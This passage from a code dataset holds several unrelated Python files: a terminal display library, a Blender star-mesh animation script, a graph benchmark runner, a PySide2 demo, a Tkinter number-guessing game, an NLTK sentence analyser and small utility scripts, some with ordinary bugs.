If given an\n odd number, it will be rounded down to the nearest even value.\n :param completed_char: The character to display for a completed chunk.\n :param empty_char: The character to display for an as-yet uncompleted chunk.\n\n :return: The percent value for the current state.\n \"\"\"\n\n # only allow even numbered widths\n if width % 2 != 0:\n width -= 1\n\n # calculate the percent\n percent = round((count * 1.0) / total * 100, 1)\n\n # only update the display if the percentage has changed\n if percent == old_percent:\n return percent\n\n # build the completed and uncompleted portions of the progress bar\n done_str = \"{0}\".format(completed_char *\n (int(round(percent / (100 / width), 0))))\n empty_str = \"{0}\".format(empty_char *\n (width - (int(round(percent / (100 / width))))))\n\n # build the X out of Y text\n count_str = \" (\" + BRIGHT_WHITE + str(count) + ENDC + \" of \" + \\\n BRIGHT_WHITE + str(total) + ENDC + \")\"\n\n # build the percent string\n percent_str = \"{0}\".format(\" \" *\n (4 - len(str(int(math.floor(percent)))))) + str(percent) + \"%\" + \" \"\n\n # build the complete string, and insert the percent\n progress_bar_str = \"[\" + done_str + empty_str + \"]\"\n progress_left = progress_bar_str[:int((len(progress_bar_str) / 2) -\n math.floor(len(percent_str) / 2)) + 2]\n progress_right = progress_bar_str[int((len(progress_bar_str) / 2) +\n math.ceil(len(percent_str) / 2)) + 2:]\n progress_bar_str = progress_left\n progress_bar_str += BRIGHT_YELLOW + percent_str + ENDC\n progress_bar_str += progress_right\n\n # append the count string\n progress_bar_str += count_str\n\n # show it\n sys.stdout.write(progress_bar_str)\n sys.stdout.flush()\n sys.stdout.write(\"\\b\" * (len(progress_bar_str))) # return to start of line\n\n # return the percent (so that we only update the percentage when it changes)\n return percent\n\n\n# ------------------------------------------------------------------------------\ndef display_error(*msgs):\n \"\"\"\n Given any number of args, converts those args to strings, concatenates them,\n and prints to stdErr.\n\n :return: Nothing.\n \"\"\"\n\n output = \"\"\n for msg in msgs:\n output += \" \" + str(msg)\n print(output.lstrip(\" \"), file=sys.stderr)\n\n\n# ------------------------------------------------------------------------------\ndef format_string(msg):\n \"\"\"\n Given a string (msg) this will format it with colors based on the {{COLOR}}\n tags. (example {{COLOR_RED}}). 
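A minimal driver loop for display_progress above, assuming this displayLib module is importable; starting old_percent at -1 forces the first draw.

import time
from displayLib import display_progress  # assumes the module is on the path

total = 200
percent = -1
for count in range(1, total + 1):
    # Threading percent back in means the bar only redraws when the value changes.
    percent = display_progress(count, total, percent)
    time.sleep(0.01)
print()  # drop to a fresh line once the bar completes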
It will also convert literal \\n character\n string into a proper newline.\n\n :param msg: The string to format.\n\n :return: The formatted string.\n \"\"\"\n\n output = msg.replace(r\"\\n\", \"\\n\")\n output = output.replace(\"{{\", \"{\")\n output = output.replace(\"}}\", \"}\")\n\n output = output.format(\n COLOR_BLACK=BLACK,\n COLOR_RED=RED,\n COLOR_GREEN=GREEN,\n COLOR_YELLOW=YELLOW,\n COLOR_BLUE=BLUE,\n COLOR_MAGENTA=MAGENTA,\n COLOR_CYAN=CYAN,\n COLOR_WHITE=WHITE,\n COLOR_BRIGHT_RED=BRIGHT_RED,\n COLOR_BRIGHT_GREEN=BRIGHT_GREEN,\n COLOR_BRIGHT_YELLOW=BRIGHT_YELLOW,\n COLOR_BRIGHT_BLUE=BRIGHT_BLUE,\n COLOR_BRIGHT_MAGENTA=BRIGHT_MAGENTA,\n COLOR_BRIGHT_CYAN=BRIGHT_CYAN,\n COLOR_BRIGHT_WHITE=BRIGHT_WHITE,\n COLOR_NONE=ENDC,\n )\n\n return output\n\n\n# ------------------------------------------------------------------------------\ndef display_message(*msgs):\n \"\"\"\n Given any number of args, converts those args to strings, concatenates them,\n and prints to stdOut.\n\n :return: Nothing.\n \"\"\"\n\n print(\" \".join([str(item) for item in msgs]))\n","sub_path":"displayLib.py","file_name":"displayLib.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"596815100","text":"#!BPY\n\"\"\"Move stars (vertices of a mesh) to different forms,\ne.g. flat map or sphere, for nice shape-transformation\nanimations.\"\"\"\n# I assume that the stars are vertices of a few meshes,\n# as created by ravestars_mesh.py,\n# so I need to move vertices of a mesh, not objects.\n# Thus use shapekeys here.\n#\n# Kristin Riebe, E-Science at AIP, kriebe@aip.de, 27.10.2014\n\nimport bpy\nimport fnmatch\nfrom math import sqrt, acos, atan2, pi\n\n\ndef get_objects(namepattern):\n \"\"\"Get objects from all scenes matching the namepattern.\n namepattern -- string regular expression\n \"\"\"\n\n objects = [obj for obj in bpy.data.objects\n if fnmatch.fnmatchcase(obj.name, namepattern)]\n\n # if only selectable and not-hidden objects, use:\n # bpy.ops.object.select_pattern(pattern=name)\n # if only objects of current scene, use:\n # bpy.context.scene.objects\n return objects\n\n\ndef shapekey_vertices_to_sphere(obj, keyname, parameters):\n \"\"\"Move vertices of mesh to a sky-sphere, using shapekey\n obj -- mesh-object with stars as vertices\n keyname -- name for shapekey (e.g. 
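And a quick usage sketch for format_string above (same import assumption): doubled braces collapse to single braces, str.format then resolves the color names, and a literal backslash-n becomes a real newline.

from displayLib import format_string  # assumes the module is on the path

msg = r"{{COLOR_BRIGHT_RED}}error:{{COLOR_NONE}} disk is full\nfree some space first"
print(format_string(msg))  # red "error:" prefix, message continues on a second line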
'KeySphere')\n parameters -- dictionary of necessary parameters,\n here: rsphere for radius of sphere\n \"\"\"\n\n rsphere = parameters[\"rsphere\"]\n\n bpy.ops.object.select_all(action='DESELECT')\n\n print(\"Adding sphere-shapekey for \", obj.name)\n m = bpy.data.objects[obj.name]\n\n obj.select = True\n\n # Add shape keys for modifying vertices of the mesh\n shapekey = m.shape_key_add(name=keyname, from_mix=True)\n shapekey.value = 1\n\n for p in shapekey.data:\n\n r = sqrt(p.co.x*p.co.x + p.co.y*p.co.y + p.co.z*p.co.z)\n\n scale = rsphere*1./r\n\n p.co.x = p.co.x * scale\n p.co.y = p.co.y * scale\n p.co.z = p.co.z * scale\n\n shapekey.value = 0\n m.active_shape_key_index = 0\n obj.select = False\n\n return shapekey\n\n\ndef shapekey_vertices_to_map(obj, keyname, parameters):\n \"\"\"Move vertices of mesh to a flat, equirectangular map\n obj -- mesh-object with stars as vertices\n keyname -- name for shapekey\n parameters -- dictionary of necessary parameters,\n here:\n mapw -- width of the map\n maph -- height of the map\n \"\"\"\n\n mapw, maph = parameters[\"mapw\"], parameters[\"maph\"]\n\n bpy.ops.object.select_all(action='DESELECT')\n\n print(\"Adding map-shapekey for \", obj.name)\n m = bpy.data.objects[obj.name]\n\n obj.select = True\n\n # Add shape keys for modifying vertices of the mesh\n shapekey = m.shape_key_add(name=keyname, from_mix=True)\n shapekey.value = 1\n\n for p in shapekey.data:\n\n r = sqrt(p.co.x*p.co.x + p.co.y*p.co.y + p.co.z*p.co.z)\n\n theta = acos(p.co.z/r)\n phi = atan2(p.co.y, p.co.x)\n\n p.co.x = -(phi/(2*pi)*mapw) # - 0.5*mapw\n p.co.y = 0\n p.co.z = -(theta/(pi)*maph - 0.5*maph)\n\n shapekey.value = 0\n m.active_shape_key_index = 0\n\n obj.select = False\n\n return shapekey\n\n\ndef make_basis_shapekeys(objects, basisname):\n \"\"\"Create basis shapekey for matching objects\n objects -- list of objects to be used\n basisname -- name for basis shapekey\n \"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n bpy.ops.object.select_pattern(pattern=namepattern)\n objects = bpy.context.selected_objects\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n print(\"Adding basis shapekey for \", obj.name)\n m = bpy.data.objects[obj.name]\n obj.select = True\n\n basis = m.shape_key_add(name=basisname)\n\n return\n\n\ndef make_shapekeys(objects, keyname, formtype, parameters):\n \"\"\"Create shapekeys for given formtype for all matching objects\n objects -- list of objects to be used\n keyname -- name for shapekey\n formtype -- type of form, e.g. 'SPHERE' or 'MAP'\n parameters -- dictionary of necessary parameters, e.g. 
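The two shapekey targets above are standard transforms: the sphere scales every vertex onto radius rsphere, and the map is equirectangular with theta = acos(z/r) and phi = atan2(y, x). A standalone numpy sketch of the map transform (no Blender required; the function name is mine):

import numpy as np

def to_equirect(points, mapw, maph):
    x, y, z = points.T
    r = np.sqrt(x**2 + y**2 + z**2)
    theta = np.arccos(z / r)            # polar angle, 0..pi
    phi = np.arctan2(y, x)              # azimuth, -pi..pi
    mx = -(phi / (2 * np.pi)) * mapw    # horizontal map coordinate
    mz = -(theta / np.pi) * maph + 0.5 * maph
    return np.stack([mx, np.zeros_like(mx), mz], axis=1)

pts = np.array([[1.0, 0.0, 0.0], [0.0, 0.0, 1.0]])
print(to_equirect(pts, mapw=7.5, maph=4.5))  # equator point lands at z=0, pole at z=maph/2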
rsphere, maph;\n see individual functions for what is needed.\n \"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n m = bpy.data.objects[obj.name]\n obj.select = True\n\n # Add shapekeys depending on given formtype\n if formtype == 'SPHERE':\n key = shapekey_vertices_to_sphere(obj, keyname, parameters)\n elif formtype == 'MAP':\n key = shapekey_vertices_to_map(obj, keyname, parameters)\n else:\n raise RuntimeError(\"There is no function implemented for \\\n formtype='%s' yet.\" % formtype)\n\n return\n\n\ndef delete_shapekeys(objects):\n \"\"\"Delete shapekeys of objects\"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n # Select, set active, then delete all shapekeys\n obj.select = True\n bpy.context.scene.objects.active = obj\n\n if obj.data.shape_keys is not None:\n bpy.ops.object.shape_key_remove(all=True)\n print(\"Shapekeys for %s deleted.\" % obj.name)\n\n obj.select = False\n\n return\n\n\ndef add_shape_animation(objects, keyname0, iframe0, keyname1, iframe1):\n \"\"\"Add animation keyframes for shapekeys\n objects -- list of objects to be used\n keyname0 -- name of basis/previous shapekey\n iframe0 -- frame at which new shapekey value is 0, keyframed\n keyname1 -- name of new shapekey\n iframe1 -- frame at which new shape gets value 1, keyframed\n \"\"\"\n\n bpy.ops.object.select_all(action='DESELECT')\n\n for obj in objects:\n m = bpy.data.objects[obj.name]\n\n # Select the object\n obj.select = True\n\n # Set the keyframes for this object\n keyblocks = m.data.shape_keys.key_blocks\n key0 = keyblocks[keyname0]\n key1 = keyblocks[keyname1]\n\n # Initial shape, value of new shapekey is 0\n iframe = iframe0\n key0.value = 1\n key1.value = 0\n key0.keyframe_insert(data_path=\"value\", frame=iframe)\n key1.keyframe_insert(data_path=\"value\", frame=iframe)\n\n # New shape with key1\n iframe = iframe1\n key0.value = 0\n key1.value = 1\n key0.keyframe_insert(data_path=\"value\", frame=iframe)\n key1.keyframe_insert(data_path=\"value\", frame=iframe)\n\n obj.select = False\n\n return\n\n\nif __name__ == '__main__':\n\n # Set parameters: sphere radius, width and height of flat map\n rsphere = 2.\n\n mapw = 7.5\n maph = 4.5\n\n # Set string pattern for the star-meshes\n namepattern = 'stars-*'\n\n # Get objects based on namepattern\n objects = get_objects(namepattern)\n\n # Set names for shapekeys (just for user convenience)\n basisname = 'Basis'\n mapkeyname = 'KeyMap'\n spherekeyname = 'KeySphere'\n\n # Delete *all* shapekeys and animation keyframes.\n # Be careful: this may do more than you want.\n delete_shapekeys(objects)\n\n # Make basis shapekey\n make_basis_shapekeys(objects, basisname)\n\n # Add sphere-shapekey\n parameters = {\"rsphere\": rsphere}\n make_shapekeys(objects, spherekeyname, 'SPHERE', parameters)\n\n # Add map-shapekey\n parameters = {\"mapw\": mapw, \"maph\": maph}\n make_shapekeys(objects, mapkeyname, 'MAP', parameters)\n\n # Add animations. 
Go backwards, because want initial distribution\n # at the end.\n\n # Set keyframes for animations\n imap1 = 0\n imap2 = 30\n isphere1 = 100\n isphere2 = 170\n ibasis = 230\n\n add_shape_animation(objects, basisname, ibasis, spherekeyname, isphere2)\n add_shape_animation(objects, spherekeyname, isphere1, mapkeyname, imap2)\n\n print(\"\\nDone.\")\n","sub_path":"deform_starmesh.py","file_name":"deform_starmesh.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"20896203","text":"#! /usr/bin/env python3\n\nimport sys\nimport os\nimport subprocess\n\n\n\n#graph_names = ['amazon.txt', 'msdoor.txt', 'google.txt', 'roadnetca.txt','soclivejournal.txt', 'road-cal.txt']\n\ngraph_names = ['msdoor.txt', 'road-cal.txt']\n\ngraph_names = [os.path.join(os.path.dirname(__file__), i) for i in graph_names]\n\ngraph_names = [\"graphs/\" + i for i in graph_names]\n\nbinary_name = \"./sssp\"\n\nexe_args_list = []\n\nfor graph in graph_names:\n #for x in ((256, 8), (384, 5), (512, 4), (768, 2), (1024, 2)):\n for x in [(512, 32)]:\n blocksize = str(x[0])\n blocknum = str(x[1])\n\n # shared memory, with bmf, sorted by destination, only only sorted by\n # destination and only for the BMF\n #exe_args_list.append([binary_name, \"--input\", graph, \"--bsize\", blocksize, \"--bcount\", blocknum, \"--output\", \"output.txt\", \"--method\", \"bmf\", \"--sync\", \"outcore\", \"--sort\", \"yes\", \"--usesmem\", \"yes\"])\n \n exe_args_list.append([binary_name, \"--input\", graph, \"--bsize\",\n blocksize, \"--bcount\", blocknum, \"--output\", \"output.txt\",\n \"--method\", \"bmf\", \"--sync\", \"incore\", \"--sort\", \"yes\", \"--usesmem\",\n \"no\"])\n\"\"\"\n for sort in (\"yes\", \"no\"):\n for method in [\"tpe\", \"bmf\"]:\n for sync in (\"outcore\", \"incore\"):\n exe_args_list.append([binary_name, \"--input\", graph, \"--bsize\",\n blocksize, \"--bcount\", blocknum, \"--output\", \"output.txt\",\n \"--method\", method, \"--sync\", sync, \"--sort\", sort, \"--usesmem\",\n \"no\"])\n\"\"\"\n\n\ntry: \n with open(\"benchmark_results.txt\", 'w') as f:\n count = 0\n for exe in exe_args_list:\n compl_time = subprocess.check_output(exe, stderr = subprocess.STDOUT).decode('utf-8') \n\n if(exe[-1] == \"yes\"):\n time = compl_time.split(\"\\n\")[5].split(\" \")[1]\n iter_c = compl_time.split(\"\\n\")[6].split(\" \")[1]\n\n f.write(\"\"\"Graph: {}, Method: BMF Shared, Block Configuration:({} {})\\nTime: {}\\nIterations:{}\\n\\n\"\"\".format(exe[2], exe[4], exe[6], time, iter_c))\n\n elif(exe[10] == \"tpe\"):\n k_time = compl_time.split(\"\\n\")[5].split(\" \")[-2]\n f_time = compl_time.split(\"\\n\")[6].split(\" \")[-2]\n t_time = compl_time.split(\"\\n\")[7].split(\" \")[-2]\n iter_c= compl_time.split(\"\\n\")[8].split(\" \")[1]\n \n f.write(\"\"\"Graph: {}, Method: TPE {} {}, Block Configuration: ({} {})\\nK_time: {}, F_Time:{}, T_time: {}\\nIterations:{}\\n\\n\"\"\".format(exe[2], exe[12], exe[-3], exe[4], exe[6], k_time, f_time, t_time, iter_c))\n\n else:\n time = compl_time.split(\"\\n\")[5].split(\" \")[1]\n iter_c = compl_time.split(\"\\n\")[6].split(\" \")[1]\n\n f.write(\"\"\"Graph: {}, Method: BMF {} {}, Block Configuration: ({} {})\\nTime: {}\\nIterations:{}\\n\\n\"\"\".format(exe[2], exe[12],\n exe[-3], exe[4], exe[6], time, iter_c))\n\n\n \n print(\"Processed {} of {}\".format(count, len(exe_args_list)))\n count +=1\n \n\nexcept subprocess.CalledProcessError as e:\n print(\"Command '\" + str(e.cmd)+ \"'failed!\")\n 
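A little further down, a PySide2 example relays slider changes to a progress bar through a hand-written Signal/Slot pair and re-shows the window on every change. Since QSlider.valueChanged(int) already matches QProgressBar.setValue(int), a direct connection does the same job; a minimal sketch:

from PySide2.QtWidgets import QApplication, QWidget, QHBoxLayout, QProgressBar, QSlider
from PySide2.QtCore import Qt

class Mirror(QWidget):
    def __init__(self):
        super().__init__()
        layout = QHBoxLayout(self)
        bar = QProgressBar()
        slider = QSlider(Qt.Vertical)
        layout.addWidget(bar)
        layout.addWidget(slider)
        # valueChanged(int) plugs straight into setValue(int); no relay method needed.
        slider.valueChanged.connect(bar.setValue)

if __name__ == "__main__":
    app = QApplication([])
    win = Mirror()
    win.show()
    app.exec_()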
print(\"Output:\")\n print(e.output)\n","sub_path":"implementation/benchmarker.py","file_name":"benchmarker.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"338085831","text":"from PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\n\nclass Test(QWidget):\n\n def __init__(self):\n QWidget.__init__(self)\n self.setWindowTitle(\"IHM\")\n self.setMinimumSize(500, 300)\n\n self.layout = QHBoxLayout()\n self.Barre = QProgressBar()\n self.Curseur = QSlider(Qt.Vertical)\n\n self.layout.addWidget(self.Barre)\n self.layout.addWidget(self.Curseur)\n\n self.Curseur.valueChanged.connect(self.Signal)\n\n self.setLayout(self.layout)\n\n def Signal(self):\n self.Slot(self.Curseur.value())\n self.show()\n\n def Slot(self,value):\n self.Barre.setValue(self.Curseur.value())\n\nif __name__ == \"__main__\":\n app = QApplication([])\n win = Test()\n win.show()\n app.exec_()\n","sub_path":"Exercice 2.py","file_name":"Exercice 2.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"184780308","text":"\"\"\"\nProvides functionality to btns in the __main__.py file.\n\"\"\"\n\nimport json\nimport clsHS\nfrom random import randint\nfrom tkinter import messagebox\n\n\nclass Funcs:\n\n def __init__(self, ui, file='guess the number/high-scores.json'):\n self.main = ui\n self._jsonFile = file\n self._diff = 'not set'\n self._tries = 0\n self._difficulties = ['easyDifficulty', 'mediumDifficulty', 'hardDifficulty']\n\n self.findHighScorers()\n\n def findHighScorers(self):\n \"\"\"\n Finds the high scorers in each difficulty as a dict.\\n\n :return: dict\n \"\"\"\n with open(self._jsonFile) as f:\n self._scores = json.load(f)\n\n easyHighScorer = list(self._scores['easyDifficulty'].keys())[0]\n mediumHighScorer = list(self._scores['mediumDifficulty'].keys())[0]\n hardHighScorer = list(self._scores['hardDifficulty'].keys())[0]\n\n eTries = self._scores['easyDifficulty'][easyHighScorer]\n mTries = self._scores['mediumDifficulty'][mediumHighScorer]\n hTries = self._scores['hardDifficulty'][hardHighScorer]\n\n return {easyHighScorer: eTries, mediumHighScorer: mTries, hardHighScorer: hTries}\n\n def showHighScorers(self):\n \"\"\"\n Finds and displays the high scorers in the main UI window.\\n\n :return: None\n \"\"\"\n self.findHighScorers()\n self.main._ezyHS.set(list(self._scores['easyDifficulty'].keys()))\n self.main._medHS.set(list(self._scores['mediumDifficulty'].keys()))\n self.main._hardHS.set(list(self._scores['hardDifficulty'].keys()))\n\n self.main._eTries.set(list(self._scores['easyDifficulty'].values()))\n self.main._mTries.set(list(self._scores['mediumDifficulty'].values()))\n self.main._hTries.set(list(self._scores['hardDifficulty'].values()))\n\n def writeHighScorers(self, diff, score):\n \"\"\"\n Writes to the json file in the difficulty and a dict of scorer and tries.\\n\n :param diff: str\\n\n :param score: dict = {scorer: tries}\\n\n :return: None\n \"\"\"\n with open(self._jsonFile) as f:\n storedData = json.load(f)\n\n storedData[diff] = score\n\n with open(self._jsonFile, 'w') as f:\n json.dump(storedData, f, indent=4)\n\n self.showHighScorers()\n\n def changeDiff(self):\n \"\"\"\n Changes the set difficulty.\\n\n :return: None\n \"\"\"\n if self._diff != 'not set':\n response = messagebox.askokcancel('Do you want to continue?',\n 'Proceeding will reset your tries and you will have to start over.')\n\n if 
response:\n self.reset()\n else:\n return\n else:\n return\n\n def setRandomNumber(self, diff):\n \"\"\"\n Sets a random number based on the given difficulty.\\n\n :param diff: str\\n\n :return: None\n \"\"\"\n self.main.tries = 0\n self.main.disableButtons()\n\n if diff == 'e':\n self._diff = 'easyDifficulty'\n self._randomInt = randint(0, 10)\n self.main._selectedDiff.set('Difficulty: Easy')\n # print(self.main.randint)\n elif diff == 'm':\n self._diff = 'mediumDifficulty'\n self._randomInt = randint(0, 100)\n self.main._selectedDiff.set('Difficulty: Medium')\n # print(self.main.randint)\n else:\n self._diff = 'hardDifficulty'\n self._randomInt = randint(0, 500)\n self.main._selectedDiff.set('Difficulty: Hard')\n # print(self.main.randint)\n\n def verify(self, *args):\n \"\"\"\n Verifies the user's guess.\\n\n :param args: event\\n\n :return: None\n \"\"\"\n num = self.main.getNum()\n name = self.main.getName()\n\n if name != '':\n if self._diff != 'not set':\n if num is not None:\n try:\n num = int(num)\n self._tries += 1\n self.main._tries.set('Tries: ' + str(self._tries))\n self.evalEntry(num, name)\n self.main.clearNumEntry()\n except ValueError:\n self.main._result.set('Please enter a number.')\n self.main.clearNumEntry()\n else:\n self.main._result.set('Please enter a number.')\n else:\n self.main._result.set('Please select a difficulty.')\n else:\n self.main._result.set('Please enter your name.')\n\n def evalEntry(self, num, name):\n \"\"\"\n Evaluates the user guess.\\n\n :param num: int\\n\n :param name: name of user\\n\n :return: None\n \"\"\"\n hints = ['Too low, try again!', 'Too high, try again!', 'Almost there, try higher!', 'Almost there, try lower!']\n compliments = ['Great!', 'Awesome!', 'Superb!', 'Bravo!', 'Wow!', 'Amazing!']\n\n if num < self._randomInt:\n difference = abs(num - self._randomInt)\n if difference > 10:\n self.main._result.set(hints[0])\n elif difference <= 10:\n self.main._result.set(hints[2])\n elif num > self._randomInt:\n difference = abs(num - self._randomInt)\n if difference > 10:\n self.main._result.set(hints[1])\n elif difference <= 10:\n self.main._result.set(hints[3])\n else:\n messagebox.showinfo(compliments[randint(0, 5)],\n 'You got it right in ' + str(self._tries) + ' tries!')\n self.main.clearNumEntry()\n self.main.enableButtons()\n\n if list(self._scores[self._diff].values())[0] is None:\n self.writeHighScorers(self._diff, {name: self._tries})\n self.showHighScorers()\n elif self._tries < list(self._scores[self._diff].values())[0]:\n self.writeHighScorers(self._diff, {name: self._tries})\n self.showHighScorers()\n\n self._tries = 0\n self.main._tries.set('Tries: ' + str(self._tries))\n self._diff = 'not set'\n self.main._selectedDiff.set('Difficulty:')\n\n self.reset()\n self.showHighScorers()\n\n def launchClearHS(self):\n \"\"\"\n Launches the clear window.\\n\n :return: None\n \"\"\"\n clsWindow = clsHS.Clear(self)\n clsWindow.winActivate()\n\n def clsHs(self):\n \"\"\"\n Clears the high scores\\n\n :return:\n \"\"\"\n for diff in self._difficulties:\n self.writeHighScorers(diff, {'None': None})\n self._clearHighScores = False\n\n self.showHighScorers()\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets the UI.\\n\n :return: None\n \"\"\"\n self._tries = 0\n self.main._tries.set('Tries: ' + str(self._tries))\n self.main._selectedDiff.set('Difficulty:')\n self.main._result.set('')\n self.main.clearNumEntry()\n 
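Just below, a contest snippet (ABC091 C) indexes cd with the loop tuple i, so cd[i] would raise TypeError; cd[j] was presumably intended, and matched points are never marked as used. A sketch of a working greedy for that pairing problem, under my reading of the intent (pair (a, b) with (c, d) when a < c and b < d, each point used at most once):

def count_pairs(ab, cd):
    used = [False] * len(ab)
    cnt = 0
    for c, d in sorted(cd):  # scan the second set by increasing c
        best = -1
        for idx, (a, b) in enumerate(ab):
            # Among unused candidates, keep the one with the largest b still below d.
            if not used[idx] and a < c and b < d and (best == -1 or b > ab[best][1]):
                best = idx
        if best != -1:
            used[best] = True
            cnt += 1
    return cnt

print(count_pairs([(2, 0), (3, 1), (1, 3)], [(4, 2), (0, 4), (5, 5)]))  # 2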
self.main.enableButtons()\n","sub_path":"btnFuncs.py","file_name":"btnFuncs.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"99861477","text":"N = int(input())\nab = []\nfor _ in range(N):\n a,b = map(int,input().split())\n ab.append((a,b))\ncd = []\nfor _ in range(N):\n c,d = map(int,input().split())\n cd.append((c,d))\n\nab.sort(reverse=True)\ncd.sort(reverse=True)\n\ncnt = 0\nfor i in ab:\n for j in range(N):\n if i[0] < cd[i][0] and i[1] < cd[i][1]:\n cnt += 1\n break\n\nprint(cnt)\n","sub_path":"ABC091/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"604068410","text":"import matplotlib.pyplot as plt\nimport csv\n\nx = []\n\nwith open('RL_EXP_OUT.dat','r') as csvfile:\n plots = csv.reader(csvfile)\n for row in plots:\n x.append(row[0])\n\nplt.ylim(ymax = 1.0)\nplt.plot(x, label='alpha = 0.1\\nepsilon = 0.0\\nQ_1 = 5')\nplt.legend()\nplt.show()\n","sub_path":"Assignment 1/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"363861871","text":"# Imports\nimport nltk\nimport string\nfrom nltk.corpus import wordnet\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\n''' Analyses sentences '''\nclass SentenceAnalyser():\n \n \n # Initialise\n def __init__(self):\n \n # Tokenizer\n self.tokenizer = nltk.tokenize.TweetTokenizer()\n \n # Lemmatizer\n self.lemmatizer = nltk.WordNetLemmatizer()\n \n # Vader intensity analyser\n self.sentiment_analyser = SentimentIntensityAnalyzer()\n \n # Weighting for parts of speech\n self.pos_weighting = {\n \"a\" : 1,\n \"v\" : 1,\n \"r\" : 1,\n \"n\" : 1, \n None : 1, \n }\n \n ''' Processes a sentence into a list containing word objects '''\n def process(self, sentence):\n \n # Tokenise\n tokenized = self.tokenizer.tokenize(sentence)\n \n # Tag parts of speech\n pos_tagged = nltk.pos_tag(tokenized)\n \n # Lemmatize\n lemmatized_pos_tagged = [(self.lemmatizer.lemmatize(tagged_tuple[0]), tagged_tuple[1]) for tagged_tuple in pos_tagged]\n\n # Convert tagged tuple to words\n word_list = [Word(tagged_tuple[0], tagged_tuple[1]) for tagged_tuple in lemmatized_pos_tagged]\n\n # Return\n return Sentence(word_list, self.sentiment_analyser.polarity_scores(sentence))\n\n ''' Calculates the similarity score for two sentences based on the words that they contain '''\n def diff(self, sentence, sentence2):\n \n # Similarities\n similarities = 0\n \n # Sentence synsets\n word_list_raw, word_list_raw2 = self.process(sentence), self.process(sentence2)\n \n # Padded lists\n word_list, word_list2 = self.__pad_list__(word_list_raw, word_list_raw2)\n \n # Iterate through synset list\n for word in word_list_raw:\n \n # Iterate through other synset list\n for word2 in word_list_raw2:\n \n # Check if words are equivalent\n if word.equivalent(word2): similarities += self.pos_weighting[synsets_tagged[1]]\n \n # Bigger & smaller sentence\n bigger, smaller = word_list, word_list2 if len(word_list) > len(word_list2) else word_list2, word_list\n \n # Calculate simscore\n sim_score = similarities / len(smallest)\n \n # Return\n return sim_score\n \n # Pads the smaller list to be equal to the length of the bigger list\n def __pad_list__(self, word_list, word_list2):\n \n # Bigger & smaller lists\n bigger, smaller = word_list, 
word_list2\n if len(word_list2) > len(word_list): bigger, smaller = word_list2, word_list # keep bigger as the longer list\n \n # Get amount to pad\n pad_amount = len(bigger) - len(smaller)\n \n # Pad\n for i in range(0, pad_amount):\n \n # Append None to the smaller list\n smaller.append(None)\n \n # Return\n return smaller, bigger\n \n'''Provides an abstraction over Nltk's Synsets'''\nclass Word():\n \n # Initialise\n def __init__(self, word_string, pos):\n \n # Word string\n self.word_string = word_string\n \n # Word part of speech\n self.pos = pos\n \n # Check if POS has wordnet equivalent\n self.pos_wn = pos_to_wn(self.pos)\n self.pos_wn = self.pos_wn if self.pos_wn != self.pos else self.pos\n \n # Synsets (kept as a plain list; wrapped in set() below so isdisjoint works)\n self.synsets = wordnet.synsets(self.word_string, self.pos_wn) if self.pos[0] in string.ascii_letters and self.pos_wn != self.pos else [self.word_string]\n \n ''' Checks if two words are equivalent '''\n def equivalent(self, word_object): return not set(self.synsets).isdisjoint(word_object.synsets)\n\n''' Sentence object '''\nclass Sentence():\n \n # Initialise\n def __init__(self, word_list, semantics): \n \n self.word_list, self.semantics = word_list, semantics\n\n''' Takes an NLTK part-of-speech tag and returns the WordNet equivalent tag. Returns the tag unchanged if there is no equivalent '''\ndef pos_to_wn(pos):\n \n if pos.startswith(\"J\"): return \"a\"\n elif pos.startswith(\"V\"): return \"v\"\n elif pos.startswith(\"N\"): return \"n\"\n elif pos.startswith(\"R\"): return \"r\"\n else: return pos\n ","sub_path":"src/main/python/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"351363890","text":"import warnings\r\nwarnings.filterwarnings('ignore',category=FutureWarning)\r\nwarnings.filterwarnings('ignore',category=DeprecationWarning)\r\nimport pickle\r\nfrom configparser import ConfigParser, NoOptionError\r\nimport os\r\nimport pandas as pd\r\nfrom simba.drop_bp_cords import drop_bp_cords\r\nfrom simba.rw_dfs import *\r\n\r\nwarnings.simplefilter(action='ignore', category=FutureWarning)\r\n\r\ndef validate_model_one_vid_1stStep(inifile,csvfile,savfile):\r\n    configFile = str(inifile)\r\n    config = ConfigParser()\r\n    config.read(configFile)\r\n    try:\r\n        wfileType = config.get('General settings', 'workflow_file_type')\r\n    except NoOptionError:\r\n        wfileType = 'csv'\r\n    sample_feature_file = str(csvfile)\r\n    sample_feature_file_Name = os.path.basename(sample_feature_file)\r\n    sample_feature_file_Name = sample_feature_file_Name.split('.', 1)[0]\r\n    classifier_path = savfile\r\n    classifier_name = os.path.basename(classifier_path).replace('.sav','')\r\n    inputFile = read_df(sample_feature_file, wfileType)\r\n    inputFile = inputFile.loc[:, ~inputFile.columns.str.contains('^Unnamed')]\r\n    inputFile = inputFile.drop(['scorer'], axis=1, errors='ignore')\r\n    inputFile.to_csv('test.csv')\r\n    outputDf = inputFile\r\n    inputFileOrganised = drop_bp_cords(inputFile, inifile)\r\n    print('Running model...')\r\n    clf = 